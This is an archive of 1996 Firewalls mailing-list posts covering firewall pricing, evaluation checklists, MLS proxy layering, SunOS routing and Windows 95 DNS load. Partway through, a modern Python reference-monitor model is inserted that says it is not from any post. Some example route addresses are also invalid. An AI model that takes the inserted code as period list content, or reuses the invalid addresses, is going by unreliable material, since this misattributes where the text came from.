lately. Sendmail 8.7.1 is over 40,000 lines. 
:-( -Rick From firewalls-owner Sat Feb 3 05:08:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA22937 for firewalls-outgoing; Sat, 3 Feb 1996 04:57:06 -0800 (PST) Received: from vent.pipex.net (vent.pipex.net [158.43.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA22930 for ; Sat, 3 Feb 1996 04:57:01 -0800 (PST) Received: from unknown by vent.pipex.net (8.6.12/PIPEX simple 1.20) id MAA02320; Sat, 3 Feb 1996 12:55:56 GMT Message-ID: In-Reply-To: <9602021310.AA16539@london.csd.harris.com> References: Conversation with last message <9602021310.AA16539@london.csd.harris.com> To: Firewall List MIME-Version: 1.0 From: Ian Johnstone-Bryden Subject: Re: Most Secure Unix? Date: Sat, 03 Feb 96 13:02:59 GMT Content-Type: text/plain; charset=US-ASCII; X-MAPIextension=".TXT" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yesterday, someone sent an email intended for me but addressed to the list by accident. This prompted a technician from a Harris overseas subsidiary to post a response back to the list. I sent appropriate email to both parties privately and would have left it there but, on reflection, the incident does have some lessons which may be of general interest to the list. The person intending to email me used a mail package at a site he was visiting, rather than waiting to use the trusted system he is familiar with. It looks like a bug in the mail application reselected the 'firewalls' address from a posting extract I had fwd but equally it could have been a human mistake. That is being looked at because the site owner has had other incidents where mail has been re-addressed before leaving his site. The site from which the email came has a typical firewall. The first lesson may therefore be that some fairly common problems cannot be caught by the firewall but could result in significant damage to the enterprise. 
Hostile attack from the outside is only one risk facing email users and, although it can be very damaging, is a very low probability against other risks. The other lesson may be from the Harris response. Making a reply to a fragment of a larger discussion can result in an out of context response. The implication of the Harris response is that Nighthawk with CyberGuard is really only going to cost a few thousand dollars. In the context of the wider discussion, Nighthawk with CyberGuard, and a number of other products were compared functionally and financially against a specific requirement and a better solution was achieved at considerably lower cost. As was pointed out in the accidental posting, these products were good products, just over priced for the particular requirement. Price was not however the only criterion and was in this particular case of secondary importance. A refreshing change to see a user identifying his potential problems, producing a functional requirement, and then selecting the most appropriate solutions before moving to a financial analysis of each proposal which met the functional specification - that may be a lesson in its own right. The fact that Nighthawk/Cyberguard, or any other product, was under specification and over priced in one situation doesn't mean that it can't be the best value in another, but you need to understand the relative specifications to know that. Harris suffers a set of problems which are not unique. Their computer systems operation has a tradition of producing highly specified hardware for aerospace and defence applications, particularly real-time OS and Ada niches. That has two commercial impacts. Firstly the niche markets traditionally have been very small and very specialised. Secondly, the niche markets have also been very demanding and this has required very heavy R&D costs and additional production costs. The resulting product is very good if your requirement is similar to the target niche market requirements. 
Inevitably it results in a significant increase in retail unit cost. If your requirement is for a system which you can mount in a military aircraft and fly through a radiation/EMP zone, buying a specialised product designed for this is actually much cheaper than buying a stack of Intel boxes. If a vendor is producing software independent of hardware, it really doesn't matter because those users who require an armour plated multi-processor machine can find a suitable platform, and those who can meet their requirements with a commodity priced PC clone can also find a suitable platform (or any point between the two extremes), in both cases mounting the same software. Obviously a company, such as Harris, is at a disadvantage because the primary reason to market is to sell hardware and the hardware may not offer best value in a specific requirement set. IMHO such a vendor has two options. One is to concentrate on those niches where the hardware specification makes their hardware good value for money. The other is to concentrate on building platform independent software. There is no margin in trying to market a product which is overpriced as a result of being over specified in particular markets. Ian J-B > > > > > Ian: > > > > well they are good products. The problem is that the systems are just > > TCP/IP firewalls and cost an arm and a leg. Most of the night hawks > > come in for around 100K. > > > > If we compete with them, we'll always have a good margin. > > > > Leroy > > > Leroy, > > I suspect that this was sent to firewalls in error, but some confusion needs > to be cleared up now that it has. > > The Harris Night Hawk is a symmetric multiprocessing computer, > the price varying according to configuration. > > The CyberGuard (Harris' firewall product) comes in for considerably less > than 100K. 
> > > Regards > > Jon From firewalls-owner Sat Feb 3 07:08:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA26760 for firewalls-outgoing; Sat, 3 Feb 1996 06:58:14 -0800 (PST) Received: from su1.in.net (su1.in.net [199.0.62.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA26755 for ; Sat, 3 Feb 1996 06:58:10 -0800 (PST) Received: from pm4-13.in.net by su1.in.net with SMTP (5.65/1.2-eef) id AA12293; Sat, 3 Feb 96 09:56:31 -0500 Date: Sat, 3 Feb 96 09:56:31 -0500 Message-Id: <9602031456.AA12293@su1.in.net> X-Sender: frankw@in.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "Dan Vukelich" From: Frank Willoughby Subject: Re: Survey Cc: firewalls@GreatCircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 04:46 PM 2/2/96 -0500, Dan Vukelich wrote: 8< [snip] >First, I'm looking for is an independent study of firewall products, with >columns such as "provides packet filtering," "supports IPX," etc. 8< [snip] Danny, Here are four sources for you to check out: 1) CSI (Computer Security Institute) put out a firewall comparison chart in the Spring 1995 Computer Security Journal (Volume XI, Number 1) They sponsor seminars & conferences on Information Security. FWIW, they are sponsoring a Network Security (NETSEC) conference in early June. I understand that the topic of firewalls crops up a couple of times in their agenda. You can contact them at: (415) 905-2626 for subscription and membership information. 2) Info Security News put out an article entitled "Shopping for Firewalls". The article has a small chart which compares 26 different vendors. This is a good magazine about Information Security. Many of the vendors who are listed in their brief comparison are including a reprint of the article in their brochures. Contact Info Security News at: (508) 879-9792 for subscription information. 
3) The Free Internet Firewall Checklist is about 150 lines in a spreadsheet which may be used in evaluating firewalls. It is easily modifiable so that you can put in evaluation criteria which are important to *you*. It is free (nice price) and available from Fortified Networks: http://www.fortified.com/fortified 4) The Internet Firewall Evaluator is available from Fortified Networks. Good stuff (but then I am somewhat biased). Further information about this can be found at: http://www.fortified.com/fortified NOTES: Items 1 & 2 are a brief comparison of the vendor's products - based on information which the vendors have supplied. Items 3 & 4 provide the questions in a spreadsheet for an easy comparison of firewall vendors based on criteria which are important to *you*. The most important criteria in evaluating firewalls are *your* criteria. Decide the value of the data/networks to be protected, the level of protection you want and how much you are willing to spend to provide this protection. Use this as your first step in sifting through the vendors. FWIW, if it was me (which it isn't) and I had a requirement that needed people to access my internal systems from the Internet (ftp, telnet, e-mail, etc), I wouldn't touch any product which didn't offer user->firewall encryption. Sadly, only a handful of vendors offer this capability. I hope the above information was useful to you. Good luck in selecting the right firewall for your company. >Danny Best Regards, Frank The opinions expressed above are of the author and may not necessarily be representative of Fortified Networks Inc. Fortified Networks Inc. 
- Management & Information Security Consulting Phone: (317) 573-0800 - http://www.fortified.com/fortified Home of the Free Internet Firewall Evaluation Checklist From firewalls-owner Sat Feb 3 07:42:20 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA27650 for firewalls-outgoing; Sat, 3 Feb 1996 07:35:09 -0800 (PST) Received: from server. ([198.199.198.20]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA27631 for ; Sat, 3 Feb 1996 07:35:04 -0800 (PST) Received: from demo2.fc.com ([198.199.198.164]) by server. (8.6.12/8.6.12) with SMTP id KAA12472 for ; Sat, 3 Feb 1996 10:33:51 -0500 Message-ID: <3113806B.199B@fc.com> Date: Sat, 03 Feb 1996 10:34:03 -0500 From: "Douglas M. Todd, Jr." Organization: fc.com X-Mailer: Mozilla 2.0GoldB1 (Win95; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: I am looking for someone in the Mass Area who is an expert Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk at ip routing? Does anyone have any connections? Douglas Todd -- >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>Douglas M. Todd, Jr. fc.com, Inc. One Federal Street BLD 102 Springfield, MA 01105 PHN: 413-733-7333 FAX: 413-733-7725 Email: Doug@fc.com or Bunyan@msn.com From firewalls-owner Sat Feb 3 09:38:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA01303 for firewalls-outgoing; Sat, 3 Feb 1996 09:22:58 -0800 (PST) Received: from garrison.com. (garrison.garrison.com [199.1.78.14]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA01298 for ; Sat, 3 Feb 1996 09:22:52 -0800 (PST) Received: by garrison.com. 
(4.1/Nutered Mailer) id AA11917; Sat, 3 Feb 96 11:19:37 CST Date: Sat, 3 Feb 96 11:19:37 CST From: jeromie@garrison.com (Jeromie Jackson) Message-Id: <9602031719.AA11917@garrison.com.> To: firewalls@greatcircle.com, jgt10@amdahl.com Subject: Re: Mandatory protection (was: product selection) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Jeromie Jackson wrote: > > I would propose a different use for the MLS architecture. > > > > > > outside---o.proxies----i.proxies-----inside > > > > > > o.proxies have level of '1'. > > i.proxies have level of '2'. > > > > > > o.proxies do not have access to write to the inside ethernet interface. > > i.proxies have privilege to read o.proxies based on label being > > dominant. > > > > From what I see, this would make a connection-based attack useless. > > You could break into the firewall and subvert the o.proxies. Data-based > > attacks could potentially succeed if neither proxies noticed the signature. > > Connection based attacks would be limited to harming the level '1' environment. > > > > I would be interested in hearing comments... > jgt10@amdahl.com wrote: > About 4 years ago I worked with a group of engineers to design an > internet firewall using a B1 operating system. We thought of the > above idea, almost exactly. > > level > > SYSHI - audit data, sources > > RESTRICTED - sys admin sources, tools > > USER - Access to internal network, > > NETWORK - Access to external/internet > > SYSTEM - Executables, configurations, reference data > > The more we looked at how to implement that architecture and > provide other user services the more complicated the picture became. > We knew we would have to re/train the users in MLS concepts and what > new functions they would need to understand and use to get data from > one level to another. In a firewall situation, one that does not require users on the box, how do you see such a model being implemented? 
With the fully transparent products in the market now, if they were to support an MLS architecture like the above, I believe you would have a higher level of integrity of the box. Attacks that were successful would be severely dampened in regard to network threats, (as outside processes cannot speak to internal sides of the IP stack). The MLS architecture appears to be a much more bullet-proof mechanism to implement containment (in comparison to chroot() setuid()). Would be very interested to hear your comments... Jeromie Jackson Director of Technology Garrison Associates jeromie@garrison.com From firewalls-owner Sat Feb 3 12:38:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06259 for firewalls-outgoing; Sat, 3 Feb 1996 12:29:40 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id MAA06254 for ; Sat, 3 Feb 1996 12:29:37 -0800 (PST) Received: from pferguso-pc.cisco.com (c2robo5.cisco.com [171.68.13.37]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id MAA22661 for ; Sat, 3 Feb 1996 12:12:53 -0800 Message-Id: <199602032012.MAA22661@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sat, 03 Feb 1996 15:13:36 -0500 To: firewalls@GreatCircle.com From: Paul Ferguson Subject: CNN on Mitnick Sender: firewalls-owner@GreatCircle.COM Precedence: bulk For what it's worth, CNN had a 5 minute segment on two books which are in print about Tsutomu Shimomura and Kevin Mitnick. See: http://www.cnn.com/CNN/Programs/CompConn/index.html - paul -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:.. 
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Sat Feb 3 12:53:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id MAA06167 for firewalls-outgoing; Sat, 3 Feb 1996 12:27:51 -0800 (PST) Received: from westie.gi.net (westie.gi.net [198.247.250.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id MAA06141 for ; Sat, 3 Feb 1996 12:27:44 -0800 (PST) Received: (from alan@localhost) by westie.gi.net (8.7.1/8.7.1) id OAA10492; Sat, 3 Feb 1996 14:26:43 -0600 (CST) From: Alan Hannan Message-Id: <199602032026.OAA10492@westie.gi.net> Subject: Re: Help with Sun-OS/Raptor Firewall To: jtriana@adp-es.com (Jorge Triana) Date: Sat, 3 Feb 1996 14:26:42 -0600 (CST) Cc: firewalls@GreatCircle.COM In-Reply-To: <1126f930@adp-es.com> from "Jorge Triana" at Feb 2, 96 02:58:05 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ......... Jorge Triana is rumored to have said: ] I have a Raptor Eagle 3.0 firewall running on a Sun SparcStation 2.0 ] running SunOS 4.1.4, (SOLARIS VERSION COMING SOON). ] The machine has two token ring cards, one for each of the net sides, ] unprotected and protected). Hmm. I wonder why you purchased a Raptor firewall? ] On the protected internal network side, I have a cisco router that is ] my gateway to the rest of the internal network. I am running IGRP in ] the internal network and also RIP on that router so that all my ] routing tables are redistributed into the ring where the Sun is ] connected to. Are you expecting your raptor firewall to route? I don't think a self respecting firewall will route packets, though all must route the packets wrt the kernel origin, hopefully they won't listen to routing protocols. Ask Marcus why, he'll tell us a nice story, methinks. 
] On the unprotected side going to the internet, I have another cisco ] router running rip and going out to the rest of the world. Rip? IGRP? Would you really trust your firewall to a silly routing protocol? ] From the SUN workstation, I can ping to the outside world, internet ] and such with out a problem. I have routes to the rest of the world. Yah, that's your default. ] I can't however, ping anything beyond my directly connected devices ] that are on the protected ring. That is, any other subnet that is not ] directly connected to the subnet where the sun is, is not accessible. Right. What you need to do is manually add the routes. Throw them into /etc/netstart, and off you go. Like so, I think: in file /etc/netstart, put the following type lines after: route -n flush route -n add default 266.1.1.1 # <- assuming this is the external unprotected router route -n add 10.0.0.0 277.1.1.1 # <- assuming your internal network is 10/8 and sent to the router 277.1.1.1 Now, your firewall knows how to get there (after rebooting, of course, else you can add the routes manually, no problem). I really hope you're not running routed on your app-gw firewall, though, but what do I know? 
-alan 'firewall lackey' From firewalls-owner Sat Feb 3 14:59:37 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA10177 for firewalls-outgoing; Sat, 3 Feb 1996 14:50:27 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA10172 for ; Sat, 3 Feb 1996 14:50:23 -0800 (PST) Message-Id: <199602032250.OAA10172@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA050587825; Sun, 4 Feb 1996 09:50:25 +1100 From: Darren Reed Subject: Re: Help with Sun-OS/Raptor Firewall To: alan@gi.net (Alan Hannan) Date: Sun, 4 Feb 1996 09:50:24 +1100 (EDT) Cc: jtriana@adp-es.com, firewalls@GreatCircle.COM In-Reply-To: <199602032026.OAA10492@westie.gi.net> from "Alan Hannan" at Feb 3, 96 02:26:42 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Alan Hannan, sie said: [...] > Right. What you need to do is manually add the routes. Throw > them into /etc/netstart, and off you go. /etc/rc.local for SunOS4.1.x (/etc/netstart is new to 4.4BSD). > Like so, I think: > > in file /etc/netstart, put the following type lines after: > > route -n flush > route -n add default 266.1.1.1 # <- assuming this is the > external unprotected > router > route -n add 10.0.0.0 277.1.1.1 # <- assuming your internal > network is 10/8 and sent > to the router 277.1.1.1 darren From firewalls-owner Sat Feb 3 18:38:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id SAA14568 for firewalls-outgoing; Sat, 3 Feb 1996 18:34:23 -0800 (PST) Received: from hobbes.orl.mmc.com (hobbes.orl.mmc.com [141.240.192.100]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id SAA14558 for ; Sat, 3 Feb 1996 18:34:20 -0800 (PST) Date: Sat, 3 Feb 1996 21:33:25 -0500 (EST) From: "A. Padgett Peterson, P.E. 
Information Security" To: firewalls@greatcircle.com Message-Id: <960203213325.202138aa@hobbes.orl.mmc.com> Subject: H-H-H-H-He's backkkkk Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >Subj: CNN on Mitnick >For what its worth, CNN had a 5 minute segment on two books which are >in print about Tsutomu Shimomura and Kevin Mitnick. Somehow this whole situation reminds me of the old saw "anyone who wants to be a politician, shouldn't." How come the people who get the "rich and famous" contracts are those who create an "attractive nuisance", those who are attracted to them, and those who have access to national tabloids disguising themselves as newspapers ? In the meantime, for those who do their job properly, nothing happens and employers wonder why they are paying them. Sometimes it seems that in order to be a "designated hero", you need a disaster which teaches that it is self-defeating to prevent the disaster in the first place. After all, where would David Sarnoff have been without the Titanic ? (Of course, it helps if you can write the history books too). Warmly, Padgett ps the real import of the MasterCard/Visa/Microsoft/Netscape accord is in the XIII (b) exclusions from ITAR. Take a look. 
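Returning to the two-tier proxy layering proposed in Jeromie Jackson's "Mandatory protection" post above (o.proxies at level 1, i.proxies at level 2, the inside interface reachable only from level 2): the Python model below is an added example, not code from any post, product or vendor on this page, of how a label-based reference monitor would mediate that layout. The level numbers, the subject and object names (o.proxy, i.proxy, ext-if, handoff, int-if) and the rule set are this example's own assumptions. The read rule is the "subject must dominate object" check the post describes (i.proxies may read o.proxies); the write rule is an integrity-style "no write-up" check chosen to match the post's claim that outside proxies cannot write to the inside interface. That write rule is not the Bell-LaPadula *-property, which permits write-up, so a real product's lattice would have to be read from its own documentation.

```python
from dataclasses import dataclass, field
from typing import Dict, List

# Hypothetical levels (this example's assumption): 1 = external-facing
# tier, 2 = internal-facing tier. A higher number dominates a lower one.
OUTSIDE, INSIDE = 1, 2


@dataclass(frozen=True)
class Labeled:
    """A subject (process) or object (interface, data) with a fixed label."""
    name: str
    level: int


def dominates(a: int, b: int) -> bool:
    return a >= b


def can_read(subject: Labeled, obj: Labeled) -> bool:
    """Read rule from the post: read only what your label dominates
    (i.proxy at 2 may read o.proxy data at 1; o.proxy may not read level 2)."""
    return dominates(subject.level, obj.level)


def can_write(subject: Labeled, obj: Labeled) -> bool:
    """Integrity-style write rule (assumption): never write upward, so a
    level-1 process can never touch a level-2 object such as the inside
    interface. This is NOT the Bell-LaPadula *-property (which allows write-up)."""
    return dominates(subject.level, obj.level)


@dataclass
class ReferenceMonitor:
    """Mediates every access and keeps an audit trail of verdicts."""
    audit: List[str] = field(default_factory=list)

    def mediate(self, subject: Labeled, op: str, obj: Labeled) -> bool:
        rule = {"read": can_read, "write": can_write}[op]
        allowed = rule(subject, obj)
        self.audit.append(
            f"{'ALLOW' if allowed else 'DENY '} {subject.name}@{subject.level} "
            f"{op} {obj.name}@{obj.level}")
        return allowed


# Hypothetical subjects and objects of the two-tier layout.
O_PROXY = Labeled("o.proxy", OUTSIDE)
I_PROXY = Labeled("i.proxy", INSIDE)
EXT_IF = Labeled("ext-if", OUTSIDE)     # outside ethernet interface
HANDOFF = Labeled("handoff", OUTSIDE)   # data o.proxy leaves for i.proxy to pull
INT_IF = Labeled("int-if", INSIDE)      # inside ethernet interface


def normal_flow(rm: ReferenceMonitor) -> bool:
    """Request in, reply out. Every step must be allowed for traffic to pass."""
    steps = [
        (O_PROXY, "read", EXT_IF),     # accept the outside connection
        (O_PROXY, "write", HANDOFF),   # stage it at level 1
        (I_PROXY, "read", HANDOFF),    # inside tier pulls it (read-down)
        (I_PROXY, "write", INT_IF),    # only level 2 may talk to the inside
        (I_PROXY, "write", HANDOFF),   # reply staged downward
        (O_PROXY, "read", HANDOFF),
        (O_PROXY, "write", EXT_IF),
    ]
    verdicts = [rm.mediate(s, op, o) for s, op, o in steps]
    return all(verdicts)


def subverted_outside_proxy(rm: ReferenceMonitor) -> Dict[str, bool]:
    """A connection-based attack that owns o.proxy still runs at level 1."""
    return {
        "write_inside_if": rm.mediate(O_PROXY, "write", INT_IF),
        "read_inside_if": rm.mediate(O_PROXY, "read", INT_IF),
        "write_handoff": rm.mediate(O_PROXY, "write", HANDOFF),  # data-attack path
    }


if __name__ == "__main__":
    monitor = ReferenceMonitor()
    print("normal traffic passes:", normal_flow(monitor))
    print("subverted o.proxy:", subverted_outside_proxy(monitor))
    print("\n".join(monitor.audit))
```

Running it shows what the post argues: a subverted o.proxy keeps its level-1 label, so a connection-based attack stays confined to the outside tier and every denied attempt lands in the audit trail, while a data-based attack still reaches the i.proxy through the handoff object and succeeds only if the inside proxy's parsing accepts it. Unlike chroot()/setuid() containment, the verdict depends on labels the compromised process cannot alter.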
From firewalls-owner Sun Feb 4 06:23:24 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA27965 for firewalls-outgoing; Sun, 4 Feb 1996 06:16:53 -0800 (PST) Received: from relay6.UU.NET (relay6.UU.NET [192.48.96.16]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA27960 for ; Sun, 4 Feb 1996 06:16:47 -0800 (PST) Received: from maestro.Maestro.COM by relay6.UU.NET with SMTP id QQablx25418; Sun, 4 Feb 1996 09:15:54 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA24695; Sun, 4 Feb 96 09:05:22 EST Date: Sun, 4 Feb 1996 09:05:21 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Negative impact of Windows 95 on firewall performance Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Following my previous post, below is my understanding of a network problem that has been created by Microsoft and which has an impact on many firewalls running DNS. This understanding is based in large part on the responses to my previous posting. Now that the problem has been identified, I would like to hear as many known solutions to the problem as possible. Windows 95 machines and some Windows NT machines are connecting to the DNS system on many company firewalls in an attempt to resolve NetBios names. The DNS lookup always fails, because DNS does not work with NetBios names and the process places unnecessary administrative overhead on the firewall. The known result of this kind of unnecessary overhead is that data throughput drops and it takes longer to establish connections that involve a DNS lookup. The IP stack in Windows 95 allows a machine to use DNS as a last resort in resolving NetBIOS names. On early versions there was an advanced setup screen which had a tick box "Use DNS for NetBIOS" which allowed the user to disable this feature; it was enabled by default. 
On the present Win95 stack an entire subsection of the IP set up relating to low-level NetBIOS/IP has been completely eliminated so there is no longer a tick box. The subsection that was eliminated also contained the "Enable WINS Proxy" flag. Every DNS query from a Windows 95 machine fails on the firewall DNS which currently will NOT cache a negative answer, so all such requests will be passed all the way up the DNS tree. During peak periods of Windows 95 DNS requests to resolve NetBios Names, as many as 8 DNS requests per second may be made to the firewall. What are the possible solutions to this problem? Sick Puppy, the Cat_Eating_Dawg the Church of the Dead Meow Experimental Cyrogenics From firewalls-owner Sun Feb 4 08:53:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00761 for firewalls-outgoing; Sun, 4 Feb 1996 08:39:50 -0800 (PST) Received: from ncelec.com ([199.238.59.23]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA00756 for ; Sun, 4 Feb 1996 08:39:46 -0800 (PST) Received: from mculver by ncelec.com (5.4R3.10/200.2.1.5) id AA10461; Sun, 4 Feb 1996 08:34:26 -0800 Message-Id: <2.2.32.19960204163906.00698424@ncelec.com> X-Sender: mculver@ncelec.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 04 Feb 1996 08:39:06 -0800 To: Sick Puppy From: Mike Culver Subject: Re: Negative impact of Windows 95 on firewall performance Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 09:05 AM 2/4/96 -0500, you wrote: > Every DNS query from a Windows 95 machine fails on the firewall DNS > which currently will NOT cache a negative answer, so all such requests > will be passed all the way up the DNS tree. During peak periods of > Windows 95 DNS requests to resolve NetBios Names, as many as 8 DNS > requests per second may be made to the firewall. 
I'm not so certain about the above statement -- if the "Computer Name" is listed in hosts, I'm fairly certain that the entry works. So perhaps the solution is to run an INTERNAL DNS server, that passes DNS down from the firewall, but never hands internal host names back up. (And, of course) lists all the WIN95 computer names with their addresses. From firewalls-owner Sun Feb 4 09:14:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA00684 for firewalls-outgoing; Sun, 4 Feb 1996 08:38:05 -0800 (PST) Received: from big486.ed-com.com (big486.ed-com.com [38.253.238.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA00679 for ; Sun, 4 Feb 1996 08:37:52 -0800 (PST) Received: by big486.ed-com.com with Microsoft Exchange (IMC 4.1.611) id <01BAF2F5.E5AFC140@big486.ed-com.com>; Sun, 4 Feb 1996 11:42:44 -0500 Message-ID: From: Ed Woodrick To: "firewalls@GreatCircle.com" Subject: RE: Negative impact of Windows 95 on firewall performance Date: Sun, 4 Feb 1996 11:42:42 -0500 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.1.611 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_01BAF2F5.E5BBF640" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I would suggest that you first get the Win95 and WINNT resource kits. They go into detail as to what is going on and what should be done in certain situations. The easiest solution is to enable a DHCP/WINS server set and set broadcasts to P-Node (I believe) so that the resolution goes to the WINS server and then to broadcast. 
And not to use WINS for Netbios resolution. This will substantially reduce network broadcasts. You are complaining about your DNS server getting I believe 10-15,000 hits per day. This, I don't believe is a large number, but if you believe that you are getting firewall performance problems, then just add another DNS server onto the network. Of course, for anyone who designs a network correctly, they will already have two DNS servers, and what you should do is to point the workstations to the non-firewall DNS. As to the whole reason why NBT (Netbios over TCP/IP) is trying to resolve names, I am assuming that you don't have Netbios installed, or don't have it selected as the default protocol and you have the TCP/IP stack installed. What you are seeing is the NBT trying to resolve names. In Netbios, all that it needed to do was broadcast, but NBT can't trust broadcast, the routers won't let it through, NBT has to go a little further. This is where WINS comes in. NBT can be setup to ask WINS (the Netbios equivalent of DNS, but dynamic instead of static) where other stations are. And DHCP can be used to configure the workstations to use the correct WINS server and the correct name resolution type. Me personally, I am ever so thankful that Microsoft made NBT so flexible and reliable. If I don't think about what I am doing, NBT will find some way to resolve the names. If I want to reduce network traffic, then I can make some changes, add a WINS and drastically reduce the broadcast traffic, WINS also supports dynamic allocation and doesn't require, like DNS, manual entry of all workstations. BTW, if you look at the DNS requests, you'll see that you could probably decrease the traffic by actually putting in the queries that are being asked for. One prime query is for the Domain and the Domain Servers on a NT network. Or in a non-NT network, the addresses of the servers. 
Of course if you were looking at a UNIX network, you would have to put these addresses in, so Microsoft is making your job easier by giving you the option. Ed Woodrick ---------- From: Sick Puppy[SMTP:sikpuppy@maestro.com] Sent: Sunday, February 04, 1996 9:05 AM To: firewalls@GreatCircle.com Subject: Negative impact of Windows 95 on firewall performance Following my previous post, below is my understanding of a network problem that has been created by Microsoft and which has an impact on many firewalls running DNS. This understanding is based in large part on the responses to my previous posting. Now that the problem has been identified, I would like to hear as many known solutions to the problem as possible. Windows 95 machines and some Windows NT machines are connecting to the DNS system on many company firewalls in an attempt to resolve NetBios names. The DNS lookup always fails, because DNS does not work with NetBios names and the process places unnecessary administrative overhead on the firewall. The known result of this kind of unnecessary overhead is that data throughput drops and it takes longer to establish connections that involve a DNS lookup. The IP stack in Windows 95 allows a machine to use DNS as a last resort in resolving NetBIOS names. On early versions there was an advanced setup screen which had a tick box "Use DNS for NetBIOS" which allowed the user to disable this feature; it was enabled by default. On the present Win95 stack an entire subsection of the IP set up relating to low-level NetBIOS/IP has been completely eliminated so there is no longer a tick box. The subsection that was eliminated also contained the "Enable WINS Proxy" flag. Every DNS query from a Windows 95 machine fails on the firewall DNS which currently will NOT cache a negative answer, so all such requests will be passed all the way up the DNS tree. 
During peak periods of Windows 95 DNS requests to resolve NetBios Names, as many as 8 DNS requests per second may be made to the firewall. What are the possible solutions to this problem? Sick Puppy, the Cat_Eating_Dawg the Church of the Dead Meow Experimental Cyrogenics From firewalls-owner Sun Feb 4 09:38:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA01241 for firewalls-outgoing; Sun, 4 Feb 1996 09:29:32 -0800 (PST) Received: from Mail.RC.Toronto.on.ca (rcooper.the-wire.com [198.53.192.91]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA01236 for ; Sun, 4 Feb 1996 09:29:26 -0800 (PST) Received: from rwcooper.RC.Toronto.on.ca ([205.206.47.2]) by Mail.RC.Toronto.on.ca (post.office MTA v1.9.1 evaluation license) with SMTP id AAA208; Sun, 4 Feb 1996 12:28:28 -0500 Received: by rwcooper.RC.Toronto.on.ca with Microsoft Mail id <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca>; Sun, 4 Feb 1996 12:27:11 -0500 Message-ID: <01BAF2FC.1BCE5F60@rwcooper.RC.Toronto.on.ca> From: "Russ.Cooper@RC.Toronto.on.ca" To: "'Sick Puppy'" Cc: "'Firewalls'" Subject: RE: Negative impact of Windows 95 on firewall performance Date: Sun, 4 Feb 1996 12:27:10 -0500 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk The solution is to put in an NT WINS server and have all your Win95 machines configured to use that WINS server. This will prevent the machines from using DNS to resolve Netbios names. As I suggested this before, I assume you want to know what to do if you do not have an NT WINS Server, is this correct? The simple answer, if the above assumption is correct, is to unbind the Client for Microsoft Networks from the 